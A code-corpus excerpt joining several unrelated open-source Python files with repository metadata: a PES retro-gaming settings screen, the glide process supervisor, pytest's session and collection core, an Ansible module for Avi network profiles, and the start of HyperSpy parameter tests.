self.__consoleList.setFocus(False)
self.__scanButton.setFocus(True)
elif event.key.keysym.sym == sdl2.SDLK_LEFT:
self.__consoleList.setFocus(True)
self.__scanButton.setFocus(False)
self.__selectAllButton.setFocus(False)
self.__deselectAllButton.setFocus(False)
else:
self.__consoleList.processEvent(event)
self.__scanButton.processEvent(event)
self.__selectAllButton.processEvent(event)
self.__deselectAllButton.processEvent(event)
if not self.__consoleList.hasFocus():
if event.key.keysym.sym == sdl2.SDLK_DOWN:
if self.__scanButton.hasFocus():
self.__scanButton.setFocus(False)
self.__selectAllButton.setFocus(True)
elif self.__selectAllButton.hasFocus():
self.__selectAllButton.setFocus(False)
self.__deselectAllButton.setFocus(True)
elif self.__deselectAllButton.hasFocus():
self.__deselectAllButton.setFocus(False)
self.__scanButton.setFocus(True)
elif event.key.keysym.sym == sdl2.SDLK_UP:
if self.__scanButton.hasFocus():
self.__scanButton.setFocus(False)
self.__deselectAllButton.setFocus(True)
elif self.__selectAllButton.hasFocus():
self.__selectAllButton.setFocus(False)
self.__scanButton.setFocus(True)
elif self.__deselectAllButton.hasFocus():
self.__deselectAllButton.setFocus(False)
self.__selectAllButton.setFocus(True)
elif selected == "Timezone" and self.__timezoneList:
self.__timezoneList.processEvent(event)
elif selected == "Audio" and self.__audioList:
if event.type == sdl2.SDL_KEYDOWN:
if event.key.keysym.sym == sdl2.SDLK_RIGHT:
self.__audioList.setFocus(False)
self.__audioSaveButton.setFocus(True)
elif event.key.keysym.sym == sdl2.SDLK_LEFT:
self.__audioSaveButton.setFocus(False)
self.__audioList.setFocus(True)
else:
self.__audioList.processEvent(event)
self.__audioSaveButton.processEvent(event)
elif selected == "Gameplay" and self.__gameplayList:
if event.type == sdl2.SDL_KEYDOWN:
if event.key.keysym.sym == sdl2.SDLK_RIGHT:
self.__gameplayList.setFocus(False)
self.__gameplaySaveButton.setFocus(True)
elif event.key.keysym.sym == sdl2.SDLK_LEFT:
self.__gameplayList.setFocus(True)
self.__gameplaySaveButton.setFocus(False)
else:
self.__gameplayList.processEvent(event)
self.__gameplaySaveButton.processEvent(event)
elif selected == "Joystick Set-Up":
if self.__ignoreJsEvents:
# don't accept an axis movement as the first input, only accept a button or hat
if event.type == sdl2.SDL_JOYBUTTONUP or event.type == sdl2.SDL_JOYHATMOTION or (event.type == sdl2.SDL_KEYUP and (event.key.keysym.sym == sdl2.SDLK_RETURN or event.key.keysym.sym == sdl2.SDLK_KP_ENTER)):
self.__ignoreJsEvents = False
elif event.type == sdl2.SDL_JOYBUTTONUP and self.__jsPrompt == 0:
self.__jsIndex = event.jbutton.which
self.__jsName = sdl2.SDL_JoystickName(self.__joysticks[self.__jsIndex])
for i in xrange(sdl2.SDL_JoystickNumAxes(self.__joysticks[self.__jsIndex])):
value = sdl2.SDL_JoystickGetAxis(self.__joysticks[self.__jsIndex], i)
logging.debug("SettingsScreen.processEvent: inital value for axis %d is: %d" % (i, value))
if value > JOYSTICK_AXIS_MAX or value < JOYSTICK_AXIS_MIN:
self.__jsInitialAxis.append(value)
else:
self.__jsInitialAxis.append(0)
self.__descriptionLabel.setText("Configuring joystick #%d, %s\n\nIf you joystick/control pad does not have the button/axis below, please press START to skip it." % (self.__jsIndex, self.__jsName))
logging.debug("SettingsScreen.processEvent: configuring joystick at %d (%s)" % (self.__jsIndex, self.__jsName))
self.__jsPrompts[self.__jsPrompt].setValue(JoystickPromptMap.BUTTON, event.jbutton.button)
self.__jsPrompt += 1
self.__jsPromptLabel.setText(self.__jsPrompts[self.__jsPrompt].getPrompt())
self.__jsTimeRemaining = self.__jsTimeOut
if self.menuActive: # this will be true if parent method trapped a backspace event
if event.type == sdl2.SDL_KEYDOWN:
if event.key.keysym.sym == sdl2.SDLK_BACKSPACE:
logging.debug("SettingsScreen.processEvent: trapping backspace event")
self.__reset(False)
def __reset(self, resetMenu=True):
self.__init = True
self.__headerLabel.setText(self.__defaultHeaderText)
self.__descriptionLabel.setText(self.__initText, True)
self.__ignoreJsEvents = True
if resetMenu:
self.menu.setSelected(0)
self.app.doJsToKeyEvents = True
def __setTimezone(self, timezone):
process = Popen("%s %s" % (self.app.config.setTimezoneCommand, timezone), stdout=PIPE, stderr=PIPE, shell=True)
stdout, stderr = process.communicate()
if process.returncode != 0:
logging.error("SettingsScreen.__setTimezone: failed to set timezone: %s" % stderr)
self.app.showMessageBox("Failed to set timezone!", None, None)
return
self.app.currentTimezone = timezone
self.__descriptionLabel.setText("You can change the current timezone from \"%s\" by selecting one from the list below." % self.app.currentTimezone, True)
self.app.showMessageBox("Timezone changed successfully", None, None)
def saveSettings(self):
logging.debug("SettingsScreen.saveSettings: saving settings...")
try:
self.app.config.retroAchievementsHardcore = self.__hardcoreModeMenuItem.isToggled()
self.app.config.set("RetroAchievements", "hardcore", self.__hardcoreModeMenuItem.isToggled())
audioDevicesToggled = self.__audioList.getMenu().getToggled()
if len(audioDevicesToggled) > 0:
device = audioDevicesToggled[0].getText()
logging.debug("SettingsScreen.saveSettings: audio device set to \"%s\"" % device)
self.app.config.audioDevice = device
self.app.config.set("Audio", "device", device)
# save ALSA settings
deviceRe = re.compile("^([\w]+):CARD=([\w]+)")
match = deviceRe.match(device)
if match:
device = "pcm.!default = plug:%s:%s" % (match.group(1), match.group(2))
else:
device = "pcm.!default = plug:%s" % device
with open(userAlsaConfFile, "w") as f:
f.write("# AUTOMATICALLY GENERATED BY PES\n")
f.write("%s\n" % device)
self.app.config.save()
self.app.goBack()
except Exception as e:
self.app.showMessageBox("Unable to save your settings (see console)", None, None)
logging.error(e)
def startScan(self):
logging.debug("SettingsScreen.startScan: beginning scan...")
self.__isBusy = True
if self.__scanProgressBar == None:
self.__scanProgressBar = ProgressBar(self.renderer, self.screenRect[0] + self.screenMargin, self.__descriptionLabel.y + self.__descriptionLabel.height + 10, self.screenRect[2] - (self.screenMargin * 2), 40, self.app.lineColour, self.app.menuBackgroundColour)
else:
self.__scanProgressBar.setProgress(0)
self.__updateDbThread = UpdateDbThread([c.getConsole() for c in self.__updateDatabaseMenu.getToggled()])
self.__updateDbThread.start()
def stop(self):
logging.debug("SettingsScreen.stop: deleting UI objects...")
super(SettingsScreen, self).stop()
if self.__updateDbThread:
self.__updateDbThread.stop()
|
neilmunday/pes
|
lib/pes/app.py
|
Python
|
gpl-3.0
| 133,635
|
[
"VisIt"
] |
0fcf13df50efea56e4dc3634d83f55e3588ae04c59bc60f4ffe9a374ff942d16
|
import os
import multiprocessing
import asyncore
import datetime
class Status(object):
"""process status enum"""
REDY, RUNN, RSTT, STNG, KLNG, STPD, EXTD = \
'READY', 'RUNNING', 'RESTARTING', \
'STOPPING', 'KILLING', 'STOPPED', 'EXITED'
class Process(asyncore.file_dispatcher):
"""main process object"""
class Message(object):
"""container class of the emitted messages from the target process"""
def __init__(self, process, message):
self.process = process
self.message = message
def __str__(self):
return '%s: %s' % (self.process.name, self.message)
def __init__(self,
name,
path,
max_nl,
bm,
try_restart=-1,
kill_duration_time=20,
):
self.status = Status.REDY # initial status READY
self.name = name
self.path = path
self.max_nl = max_nl # max name length
self.bm = bm # blast module
self.try_restart = try_restart
self.kill_duration_time = kill_duration_time
self.bi = 0 # blast index
self.restarted = 0
self.rpi = 0
self.wpi = 0
self.status = Status.REDY
self.start_time = None
def start(self):
if self.status not in (Status.REDY, Status.STPD, Status.EXTD):
return False, 'already operating'
self.rpi, self.wpi = os.pipe()
self.process = multiprocessing.Process(
target=self.__execute,
args=(self.path, self.rpi, self.wpi)
)
self.process.start()
self.pid = self.process.pid
# register the pipe's reader descriptor to asyncore
asyncore.file_dispatcher.__init__(self, self.rpi)
self.status = Status.RUNN
self.start_time = datetime.datetime.now()
self.elapsed_rule_time = None
return True, ''
def __execute(self, path, rpi, wpi):
pid = os.getpid()
# set the child process as a process group master itself
os.setpgid(pid, pid)
os.dup2(wpi, 1)
os.dup2(wpi, 2)
os.close(wpi)
os.close(rpi)
os.execv(path[0], path)
def handle_read(self):
data = []
try:
while True: # read data from the pipe's reader
d = self.recv(1)
if d == '\n':
break
data.append(d)
# blast to the registered blast module
self.bm(Process.Message(self, ''.join(data)), self.bi)
self.bi += 1
except OSError: # tried to read after the descriptor closed
pass
def writable(self):
"""trick: add timeout callback implementation"""
if self.elapsed_rule_time:
self.elapsed_time = datetime.datetime.now() - self.elapsed_rule_time
if self.elapsed_time > \
datetime.timedelta(seconds=self.kill_duration_time):
os.kill(self.pid, 9)
return False
def terminate(self):
try:
self.elapsed_rule_time = datetime.datetime.now()
self.process.terminate()
except OSError: # no such process id
pass
def stop(self):
if self.status != Status.RUNN:
return False, 'not running'
self.status = Status.STNG
self.terminate()
return True, ''
def restart(self):
if self.status != Status.RUNN:
return False, 'not running'
self.status = Status.RSTT
self.terminate()
return True, ''
def hangup(self):
if self.status != Status.RUNN:
return False, 'not running'
os.kill(self.proc.pid, 1)
return True, ''
def alarm(self):
if self.status != Status.RUNN:
return False, 'not running'
os.kill(self.proc.pid, 14)
return True, ''
def cleanup(self):
for descriptor in [self.rpi, self.wpi]:
try:
os.close(descriptor)
except:
pass
asyncore.file_dispatcher.close(self)
if ((self.try_restart == -1 or self.try_restart > self.restarted) and
self.status == Status.EXTD) or self.status == Status.RSTT:
self.restarted += 1
self.status = Status.REDY
self.start()
return self
else:
self.status = Status.STPD
return None
def handle_error(self):
nil, t, v, tbinfo = asyncore.compact_traceback()
print '---', nil, t, v, tbinfo
def __str__(self):
if self.status not in (Status.STPD, Status.REDY, Status.EXTD):
tmpl = '%-' + str(self.max_nl) + \
's %10s pid %5s, uptime %s sec'
return tmpl % (self.name,
self.status,
self.pid,
datetime.datetime.now() - self.start_time)
else:
tmpl = '%-' + str(self.max_nl) + 's %10s'
return tmpl % (self.name,
self.status,)
|
eseom/glide
|
glide/process.py
|
Python
|
mit
| 5,210
|
[
"BLAST"
] |
5fb6b39466fb867692b4b8dc4c61371e9ec0bad9ba8bad7d59e216aae53b5fd9
|
""" core implementation of testing process: init, session, runtest loop. """
import py
import pytest, _pytest
import os, sys, imp
tracebackcutdir = py.path.local(_pytest.__file__).dirpath()
# exitcodes for the command line
EXIT_OK = 0
EXIT_TESTSFAILED = 1
EXIT_INTERRUPTED = 2
EXIT_INTERNALERROR = 3
EXIT_USAGEERROR = 4
name_re = py.std.re.compile("^[a-zA-Z_]\w*$")
def pytest_addoption(parser):
parser.addini("norecursedirs", "directory patterns to avoid for recursion",
type="args", default=('.*', 'CVS', '_darcs', '{arch}'))
#parser.addini("dirpatterns",
# "patterns specifying possible locations of test files",
# type="linelist", default=["**/test_*.txt",
# "**/test_*.py", "**/*_test.py"]
#)
group = parser.getgroup("general", "running and selection options")
group._addoption('-x', '--exitfirst', action="store_true", default=False,
dest="exitfirst",
help="exit instantly on first error or failed test."),
group._addoption('--maxfail', metavar="num",
action="store", type="int", dest="maxfail", default=0,
help="exit after first num failures or errors.")
group._addoption('--strict', action="store_true",
help="run pytest in strict mode, warnings become errors.")
group = parser.getgroup("collect", "collection")
group.addoption('--collectonly',
action="store_true", dest="collectonly",
help="only collect tests, don't execute them."),
group.addoption('--pyargs', action="store_true",
help="try to interpret all arguments as python packages.")
group.addoption("--ignore", action="append", metavar="path",
help="ignore path during collection (multi-allowed).")
group.addoption('--confcutdir', dest="confcutdir", default=None,
metavar="dir",
help="only load conftest.py's relative to specified dir.")
group = parser.getgroup("debugconfig",
"test session debugging and configuration")
group.addoption('--basetemp', dest="basetemp", default=None, metavar="dir",
help="base temporary directory for this test run.")
def pytest_namespace():
collect = dict(Item=Item, Collector=Collector, File=File, Session=Session)
return dict(collect=collect)
def pytest_configure(config):
py.test.config = config # compatibiltiy
if config.option.exitfirst:
config.option.maxfail = 1
def wrap_session(config, doit):
"""Skeleton command line program"""
session = Session(config)
session.exitstatus = EXIT_OK
initstate = 0
try:
try:
config.pluginmanager.do_configure(config)
initstate = 1
config.hook.pytest_sessionstart(session=session)
initstate = 2
doit(config, session)
except pytest.UsageError:
msg = sys.exc_info()[1].args[0]
sys.stderr.write("ERROR: %s\n" %(msg,))
session.exitstatus = EXIT_USAGEERROR
except KeyboardInterrupt:
excinfo = py.code.ExceptionInfo()
config.hook.pytest_keyboard_interrupt(excinfo=excinfo)
session.exitstatus = EXIT_INTERRUPTED
except:
excinfo = py.code.ExceptionInfo()
config.pluginmanager.notify_exception(excinfo, config.option)
session.exitstatus = EXIT_INTERNALERROR
if excinfo.errisinstance(SystemExit):
sys.stderr.write("mainloop: caught Spurious SystemExit!\n")
finally:
if initstate >= 2:
config.hook.pytest_sessionfinish(session=session,
exitstatus=session.exitstatus or (session._testsfailed and 1))
if not session.exitstatus and session._testsfailed:
session.exitstatus = EXIT_TESTSFAILED
if initstate >= 1:
config.pluginmanager.do_unconfigure(config)
return session.exitstatus
def pytest_cmdline_main(config):
return wrap_session(config, _main)
def _main(config, session):
""" default command line protocol for initialization, session,
running tests and reporting. """
config.hook.pytest_collection(session=session)
config.hook.pytest_runtestloop(session=session)
def pytest_collection(session):
return session.perform_collect()
def pytest_runtestloop(session):
if session.config.option.collectonly:
return True
for i, item in enumerate(session.items):
try:
nextitem = session.items[i+1]
except IndexError:
nextitem = None
item.config.hook.pytest_runtest_protocol(item=item, nextitem=nextitem)
if session.shouldstop:
raise session.Interrupted(session.shouldstop)
return True
def pytest_ignore_collect(path, config):
p = path.dirpath()
ignore_paths = config._getconftest_pathlist("collect_ignore", path=p)
ignore_paths = ignore_paths or []
excludeopt = config.getvalue("ignore")
if excludeopt:
ignore_paths.extend([py.path.local(x) for x in excludeopt])
return path in ignore_paths
class HookProxy:
def __init__(self, fspath, config):
self.fspath = fspath
self.config = config
def __getattr__(self, name):
hookmethod = getattr(self.config.hook, name)
def call_matching_hooks(**kwargs):
plugins = self.config._getmatchingplugins(self.fspath)
return hookmethod.pcall(plugins, **kwargs)
return call_matching_hooks
def compatproperty(name):
def fget(self):
return getattr(pytest, name)
return property(fget, None, None,
"deprecated attribute %r, use pytest.%s" % (name,name))
class Node(object):
""" base class for all Nodes in the collection tree.
Collector subclasses have children, Items are terminal nodes."""
def __init__(self, name, parent=None, config=None, session=None):
#: a unique name with the scope of the parent
self.name = name
#: the parent collector node.
self.parent = parent
#: the test config object
self.config = config or parent.config
#: the collection this node is part of
self.session = session or parent.session
#: filesystem path where this node was collected from
self.fspath = getattr(parent, 'fspath', None)
self.ihook = self.session.gethookproxy(self.fspath)
self.keywords = {self.name: True}
Module = compatproperty("Module")
Class = compatproperty("Class")
Instance = compatproperty("Instance")
Function = compatproperty("Function")
File = compatproperty("File")
Item = compatproperty("Item")
def _getcustomclass(self, name):
cls = getattr(self, name)
if cls != getattr(pytest, name):
py.log._apiwarn("2.0", "use of node.%s is deprecated, "
"use pytest_pycollect_makeitem(...) to create custom "
"collection nodes" % name)
return cls
def __repr__(self):
return "<%s %r>" %(self.__class__.__name__, getattr(self, 'name', None))
# methods for ordering nodes
@property
def nodeid(self):
try:
return self._nodeid
except AttributeError:
self._nodeid = x = self._makeid()
return x
def _makeid(self):
return self.parent.nodeid + "::" + self.name
def __eq__(self, other):
if not isinstance(other, Node):
return False
return self.__class__ == other.__class__ and \
self.name == other.name and self.parent == other.parent
def __ne__(self, other):
return not self == other
def __hash__(self):
return hash((self.name, self.parent))
def setup(self):
pass
def teardown(self):
pass
def _memoizedcall(self, attrname, function):
exattrname = "_ex_" + attrname
failure = getattr(self, exattrname, None)
if failure is not None:
py.builtin._reraise(failure[0], failure[1], failure[2])
if hasattr(self, attrname):
return getattr(self, attrname)
try:
res = function()
except py.builtin._sysex:
raise
except:
failure = py.std.sys.exc_info()
setattr(self, exattrname, failure)
raise
setattr(self, attrname, res)
return res
def listchain(self):
""" return list of all parent collectors up to self,
starting from root of collection tree. """
chain = []
item = self
while item is not None:
chain.append(item)
item = item.parent
chain.reverse()
return chain
def listnames(self):
return [x.name for x in self.listchain()]
def getplugins(self):
return self.config._getmatchingplugins(self.fspath)
def getparent(self, cls):
current = self
while current and not isinstance(current, cls):
current = current.parent
return current
def _prunetraceback(self, excinfo):
pass
def _repr_failure_py(self, excinfo, style=None):
if self.config.option.fulltrace:
style="long"
else:
self._prunetraceback(excinfo)
# XXX should excinfo.getrepr record all data and toterminal()
# process it?
if style is None:
if self.config.option.tbstyle == "short":
style = "short"
else:
style = "long"
return excinfo.getrepr(funcargs=True,
showlocals=self.config.option.showlocals,
style=style)
repr_failure = _repr_failure_py
class Collector(Node):
""" Collector instances create children through collect()
and thus iteratively build a tree.
"""
class CollectError(Exception):
""" an error during collection, contains a custom message. """
def collect(self):
""" returns a list of children (items and collectors)
for this collection node.
"""
raise NotImplementedError("abstract")
def repr_failure(self, excinfo):
""" represent a collection failure. """
if excinfo.errisinstance(self.CollectError):
exc = excinfo.value
return str(exc.args[0])
return self._repr_failure_py(excinfo, style="short")
def _memocollect(self):
""" internal helper method to cache results of calling collect(). """
return self._memoizedcall('_collected', lambda: list(self.collect()))
def _prunetraceback(self, excinfo):
if hasattr(self, 'fspath'):
path = self.fspath
traceback = excinfo.traceback
ntraceback = traceback.cut(path=self.fspath)
if ntraceback == traceback:
ntraceback = ntraceback.cut(excludepath=tracebackcutdir)
excinfo.traceback = ntraceback.filter()
class FSCollector(Collector):
def __init__(self, fspath, parent=None, config=None, session=None):
fspath = py.path.local(fspath) # xxx only for test_resultlog.py?
name = fspath.basename
if parent is not None:
rel = fspath.relto(parent.fspath)
if rel:
name = rel
name = name.replace(os.sep, "/")
super(FSCollector, self).__init__(name, parent, config, session)
self.fspath = fspath
def _makeid(self):
if self == self.session:
return "."
relpath = self.session.fspath.bestrelpath(self.fspath)
if os.sep != "/":
relpath = relpath.replace(os.sep, "/")
return relpath
class File(FSCollector):
""" base class for collecting tests from a file. """
class Item(Node):
""" a basic test invocation item. Note that for a single function
there might be multiple test invocation items.
"""
nextitem = None
def reportinfo(self):
return self.fspath, None, ""
@property
def location(self):
try:
return self._location
except AttributeError:
location = self.reportinfo()
# bestrelpath is a quite slow function
cache = self.config.__dict__.setdefault("_bestrelpathcache", {})
try:
fspath = cache[location[0]]
except KeyError:
fspath = self.session.fspath.bestrelpath(location[0])
cache[location[0]] = fspath
location = (fspath, location[1], str(location[2]))
self._location = location
return location
class NoMatch(Exception):
""" raised if matching cannot locate a matching names. """
class Session(FSCollector):
class Interrupted(KeyboardInterrupt):
""" signals an interrupted test run. """
__module__ = 'builtins' # for py3
def __init__(self, config):
super(Session, self).__init__(py.path.local(), parent=None,
config=config, session=self)
assert self.config.pluginmanager.register(self, name="session", prepend=True)
self._testsfailed = 0
self.shouldstop = False
self.trace = config.trace.root.get("collection")
self._norecursepatterns = config.getini("norecursedirs")
def pytest_collectstart(self):
if self.shouldstop:
raise self.Interrupted(self.shouldstop)
def pytest_runtest_logreport(self, report):
if report.failed and 'xfail' not in getattr(report, 'keywords', []):
self._testsfailed += 1
maxfail = self.config.getvalue("maxfail")
if maxfail and self._testsfailed >= maxfail:
self.shouldstop = "stopping after %d failures" % (
self._testsfailed)
pytest_collectreport = pytest_runtest_logreport
def isinitpath(self, path):
return path in self._initialpaths
def gethookproxy(self, fspath):
return HookProxy(fspath, self.config)
def perform_collect(self, args=None, genitems=True):
hook = self.config.hook
try:
items = self._perform_collect(args, genitems)
hook.pytest_collection_modifyitems(session=self,
config=self.config, items=items)
finally:
hook.pytest_collection_finish(session=self)
return items
def _perform_collect(self, args, genitems):
if args is None:
args = self.config.args
self.trace("perform_collect", self, args)
self.trace.root.indent += 1
self._notfound = []
self._initialpaths = set()
self._initialparts = []
self.items = items = []
for arg in args:
parts = self._parsearg(arg)
self._initialparts.append(parts)
self._initialpaths.add(parts[0])
self.ihook.pytest_collectstart(collector=self)
rep = self.ihook.pytest_make_collect_report(collector=self)
self.ihook.pytest_collectreport(report=rep)
self.trace.root.indent -= 1
if self._notfound:
for arg, exc in self._notfound:
line = "(no name %r in any of %r)" % (arg, exc.args[0])
raise pytest.UsageError("not found: %s\n%s" %(arg, line))
if not genitems:
return rep.result
else:
if rep.passed:
for node in rep.result:
self.items.extend(self.genitems(node))
return items
def collect(self):
for parts in self._initialparts:
arg = "::".join(map(str, parts))
self.trace("processing argument", arg)
self.trace.root.indent += 1
try:
for x in self._collect(arg):
yield x
except NoMatch:
# we are inside a make_report hook so
# we cannot directly pass through the exception
self._notfound.append((arg, sys.exc_info()[1]))
self.trace.root.indent -= 1
break
self.trace.root.indent -= 1
def _collect(self, arg):
names = self._parsearg(arg)
path = names.pop(0)
if path.check(dir=1):
assert not names, "invalid arg %r" %(arg,)
for path in path.visit(fil=lambda x: x.check(file=1),
rec=self._recurse, bf=True, sort=True):
for x in self._collectfile(path):
yield x
else:
assert path.check(file=1)
for x in self.matchnodes(self._collectfile(path), names):
yield x
def _collectfile(self, path):
ihook = self.gethookproxy(path)
if not self.isinitpath(path):
if ihook.pytest_ignore_collect(path=path, config=self.config):
return ()
return ihook.pytest_collect_file(path=path, parent=self)
def _recurse(self, path):
ihook = self.gethookproxy(path.dirpath())
if ihook.pytest_ignore_collect(path=path, config=self.config):
return
for pat in self._norecursepatterns:
if path.check(fnmatch=pat):
return False
ihook = self.gethookproxy(path)
ihook.pytest_collect_directory(path=path, parent=self)
return True
def _tryconvertpyarg(self, x):
mod = None
path = [os.path.abspath('.')] + sys.path
for name in x.split('.'):
# ignore anything that's not a proper name here
# else something like --pyargs will mess up '.'
# since imp.find_module will actually sometimes work for it
# but it's supposed to be considered a filesystem path
# not a package
if name_re.match(name) is None:
return x
try:
fd, mod, type_ = imp.find_module(name, path)
except ImportError:
return x
else:
if fd is not None:
fd.close()
if type_[2] != imp.PKG_DIRECTORY:
path = [os.path.dirname(mod)]
else:
path = [mod]
return mod
def _parsearg(self, arg):
""" return (fspath, names) tuple after checking the file exists. """
arg = str(arg)
if self.config.option.pyargs:
arg = self._tryconvertpyarg(arg)
parts = str(arg).split("::")
relpath = parts[0].replace("/", os.sep)
path = self.fspath.join(relpath, abs=True)
if not path.check():
if self.config.option.pyargs:
msg = "file or package not found: "
else:
msg = "file not found: "
raise pytest.UsageError(msg + arg)
parts[0] = path
return parts
def matchnodes(self, matching, names):
self.trace("matchnodes", matching, names)
self.trace.root.indent += 1
nodes = self._matchnodes(matching, names)
num = len(nodes)
self.trace("matchnodes finished -> ", num, "nodes")
self.trace.root.indent -= 1
if num == 0:
raise NoMatch(matching, names[:1])
return nodes
def _matchnodes(self, matching, names):
if not matching or not names:
return matching
name = names[0]
assert name
nextnames = names[1:]
resultnodes = []
for node in matching:
if isinstance(node, pytest.Item):
if not names:
resultnodes.append(node)
continue
assert isinstance(node, pytest.Collector)
node.ihook.pytest_collectstart(collector=node)
rep = node.ihook.pytest_make_collect_report(collector=node)
if rep.passed:
has_matched = False
for x in rep.result:
if x.name == name:
resultnodes.extend(self.matchnodes([x], nextnames))
has_matched = True
# XXX accept IDs that don't have "()" for class instances
if not has_matched and len(rep.result) == 1 and x.name == "()":
nextnames.insert(0, name)
resultnodes.extend(self.matchnodes([x], nextnames))
node.ihook.pytest_collectreport(report=rep)
return resultnodes
def genitems(self, node):
self.trace("genitems", node)
if isinstance(node, pytest.Item):
node.ihook.pytest_itemcollected(item=node)
yield node
else:
assert isinstance(node, pytest.Collector)
node.ihook.pytest_collectstart(collector=node)
rep = node.ihook.pytest_make_collect_report(collector=node)
if rep.passed:
for subnode in rep.result:
for x in self.genitems(subnode):
yield x
node.ihook.pytest_collectreport(report=rep)
|
npinto/pytest
|
_pytest/main.py
|
Python
|
mit
| 20,958
|
[
"VisIt"
] |
26d3491699307820aed2b98ff52474ffa1e45bc12053dea28339fa0df3dfefec
|
#!/usr/bin/python
#
# @author: Gaurav Rastogi (grastogi@avinetworks.com)
# Eric Anderson (eanderson@avinetworks.com)
# module_check: supported
# Avi Version: 17.1.1
#
# Copyright: (c) 2017 Gaurav Rastogi, <grastogi@avinetworks.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: avi_networkprofile
author: Gaurav Rastogi (@grastogi23) <grastogi@avinetworks.com>
short_description: Module for setup of NetworkProfile Avi RESTful Object
description:
- This module is used to configure NetworkProfile object
- more examples at U(https://github.com/avinetworks/devops)
requirements: [ avisdk ]
version_added: "2.3"
options:
state:
description:
- The state that should be applied on the entity.
default: present
choices: ["absent", "present"]
avi_api_update_method:
description:
- Default method for object update is HTTP PUT.
- Setting to patch will override that behavior to use HTTP PATCH.
version_added: "2.5"
default: put
choices: ["put", "patch"]
avi_api_patch_op:
description:
- Patch operation to use when using avi_api_update_method as patch.
version_added: "2.5"
choices: ["add", "replace", "delete"]
description:
description:
- User defined description for the object.
name:
description:
- The name of the network profile.
required: true
profile:
description:
- Networkprofileunion settings for networkprofile.
required: true
tenant_ref:
description:
- It is a reference to an object of type tenant.
url:
description:
- Avi controller URL of the object.
uuid:
description:
- Uuid of the network profile.
extends_documentation_fragment:
- avi
'''
EXAMPLES = """
- name: Create a network profile for an UDP application
avi_networkprofile:
controller: '{{ controller }}'
username: '{{ username }}'
password: '{{ password }}'
name: System-UDP-Fast-Path
profile:
type: PROTOCOL_TYPE_UDP_FAST_PATH
udp_fast_path_profile:
per_pkt_loadbalance: false
session_idle_timeout: 10
snat: true
tenant_ref: admin
"""
RETURN = '''
obj:
description: NetworkProfile (api/networkprofile) object
returned: success, changed
type: dict
'''
from ansible.module_utils.basic import AnsibleModule
try:
from ansible.module_utils.network.avi.avi import (
avi_common_argument_spec, HAS_AVI, avi_ansible_api)
except ImportError:
HAS_AVI = False
def main():
argument_specs = dict(
state=dict(default='present',
choices=['absent', 'present']),
avi_api_update_method=dict(default='put',
choices=['put', 'patch']),
avi_api_patch_op=dict(choices=['add', 'replace', 'delete']),
description=dict(type='str',),
name=dict(type='str', required=True),
profile=dict(type='dict', required=True),
tenant_ref=dict(type='str',),
url=dict(type='str',),
uuid=dict(type='str',),
)
argument_specs.update(avi_common_argument_spec())
module = AnsibleModule(
argument_spec=argument_specs, supports_check_mode=True)
if not HAS_AVI:
return module.fail_json(msg=(
'Avi python API SDK (avisdk>=17.1) is not installed. '
'For more details visit https://github.com/avinetworks/sdk.'))
return avi_ansible_api(module, 'networkprofile',
set([]))
if __name__ == '__main__':
main()
|
alxgu/ansible
|
lib/ansible/modules/network/avi/avi_networkprofile.py
|
Python
|
gpl-3.0
| 3,909
|
[
"VisIt"
] |
cacdbc67eebbc9d93eb00d7c071455c1307a9c781a2997f798acbdfdc3556fae
|
# Copyright 2007-2016 The HyperSpy developers
#
# This file is part of HyperSpy.
#
# HyperSpy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# HyperSpy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with HyperSpy. If not, see <http://www.gnu.org/licenses/>.
import numpy as np
import nose.tools as nt
from hyperspy._signals.signal1d import Signal1D
from hyperspy.component import Parameter, Component
from hyperspy.components1d import Gaussian, Lorentzian, ScalableFixedPattern
def remove_empty_numpy_strings(dic):
for k, v in dic.items():
if isinstance(v, dict):
remove_empty_numpy_strings(v)
elif isinstance(v, list):
for vv in v:
if isinstance(vv, dict):
remove_empty_numpy_strings(vv)
elif isinstance(vv, np.string_) and len(vv) == 0:
vv = ''
elif isinstance(v, np.string_) and len(v) == 0:
del dic[k]
dic[k] = ''
class DummyAxesManager:
navigation_shape = [1, ]
navigation_size = 2
indices = ()
@property
def _navigation_shape_in_array(self):
return self.navigation_shape[::-1]
class TestParameterDictionary:
def setUp(self):
self.par = Parameter()
self.par.name = 'asd'
self.par._id_name = 'newone'
def ft(x):
return x * x
def fit(x):
return x * x + 1
self.par.twin_function = ft
self.par.twin_inverse_function = fit
self.par._axes_manager = DummyAxesManager()
self.par._create_array()
self.par.value = 1
self.par.std = 0.1
self.par.store_current_value_in_array()
self.par.ext_bounded = False
self.par.ext_force_positive = False
def test_to_dictionary(self):
d = self.par.as_dictionary()
nt.assert_equal(d['name'], self.par.name)
nt.assert_equal(d['_id_name'], self.par._id_name)
np.testing.assert_equal(d['map']['values'][0], 1)
np.testing.assert_equal(d['map']['std'][0], 0.1)
nt.assert_true(d['map']['is_set'][0])
np.testing.assert_equal(d['value'], self.par.value)
np.testing.assert_equal(d['std'], self.par.std)
nt.assert_is(d['free'], self.par.free)
nt.assert_equal(d['self'], id(self.par))
np.testing.assert_equal(d['_bounds'], self.par._bounds)
nt.assert_is(d['ext_bounded'], self.par.ext_bounded)
nt.assert_is(
d['ext_force_positive'], self.par.ext_force_positive)
def test_load_dictionary(self):
d = self.par.as_dictionary()
p = Parameter()
p._id_name = 'newone'
_id = p._load_dictionary(d)
nt.assert_equal(_id, id(self.par))
nt.assert_equal(p.name, self.par.name)
nt.assert_equal(p._id_name, self.par._id_name)
np.testing.assert_equal(p.map['values'][0], 1)
np.testing.assert_equal(p.map['std'][0], 0.1)
nt.assert_true(p.map['is_set'][0])
np.testing.assert_equal(p.value, self.par.value)
np.testing.assert_equal(p.std, self.par.std)
np.testing.assert_equal(p.free, self.par.free)
np.testing.assert_equal(p._bounds, self.par._bounds)
rn = np.random.random()
np.testing.assert_equal(
p.twin_function(rn),
self.par.twin_function(rn))
np.testing.assert_equal(
p.twin_inverse_function(rn),
self.par.twin_inverse_function(rn))
@nt.raises(ValueError)
def test_invalid_name(self):
d = self.par.as_dictionary()
d['_id_name'] = 'otherone'
p = Parameter()
